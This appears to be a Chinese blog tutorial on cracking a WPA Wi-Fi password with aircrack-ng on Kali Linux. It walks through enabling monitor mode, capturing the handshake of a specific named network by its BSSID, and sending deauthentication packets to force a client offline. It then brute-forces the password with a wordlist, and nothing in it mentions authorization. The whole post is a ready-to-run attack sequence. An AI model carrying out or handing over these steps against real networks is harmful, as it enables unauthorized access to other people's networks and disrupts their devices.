一次成功的“wifi破解”

kali 2017-04-17

使用的工具及其环境:

  1. kali
  2. 无线网卡(笔记本的省略此工具)
  3. 需要有wifi的环境下

使用的工具及其环境准备就绪后,下面就开始我们的最关注的话题了··········

我们要使用kali下面的一款名叫aircrack-ng的工具,但是什么叫aircrack-ng呢??下面是百度对aircrack-ng的定义:


Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站或[1])并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
2007年四月,德国达姆施塔特工业大学的研究小组根据Adi Shamir(RSA发明人之一)发表的论文,研究出了一种新的攻击方式。这个名叫“PTW”的方法降低了在解密WEP所需的的初始化向量数量并从aircrack-ng 0.9版本开始被应用。
Aircrack-ng是Aircrack项目的一个分支。

好了,需要进一步了解aircrack-ng工具的自行百度,下面开始教程:


首先打开我们的kali:

kali.png

是不是感觉很不错!!!

第二步: 右键打开终端输入

ifconfig

查看自己的wifi接口是什么,一般是wlan0
1.png

第三步:然后开启监听模式输入命令

airmon-ng start wlan0

2.png

第四步:开启监听模式后,输入

airodump-ng -a wlan0mon

搜素你附近的所有wifi信号,搜索1-2分钟后需要停的话按住ctrl+c
3.png

第五步:我们知道wifi在使用过程中都是通过包来接受和发布数据的,所有选择你要获取的指定wifi的数据包,我这里需要对LieBaoWiFi481进行抓包所有我使用命令

airodump-ng -w /root/ --bssid 5E:30:7D:EF:78:61 -c 11 wlan0mon

其中:-w是你要保存的抓到包的保存地址,-bssid后面接的是你要抓包wifi的mac地址,-c后面是wifi的信道

第六步:保持刚刚抓包的窗口不要关闭,然后在新建一个窗口输入

aireplay-ng --deauth 20 -a 5E:30:7D:EF:78:61 -c 14:1F:78:F2:2C:53 wlan0mon

进行对wifi的kill,然客户机下线,然后我们快速的获取的数据包 || 其中-a是wifi的mac地址,-c是客户端的mac地址

攻击完了后,观察wifi抓包的窗口直到出现下面我红圈的界面就算抓到包了,然后在就可以在按ctrl+c关闭抓包窗口了

4.png

第七步:抓到包后通过字典进行wifi密码暴力破解,kali下面自带的有wifi字典,也还是很不错的,如果觉得kali字典不行的可以通过百度搜索”字典制作工具“自己制作字典下面我已经准备好了一个字典就直接开始破解,使用命令:

aircrack-ng -w /root/桌面/密码/字典1.txt /root/-01.cap

然后就开始破解wifi密码了,其中:-w是指定一个字典,/root/-01.cap是刚刚抓取的wifi数据包的路径。 看我的wifi密码已经破解出来了。

5.png

好了,教程就是这样,还有什么不懂的留言或者加我QQ!!!


本文由 小 鹏 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论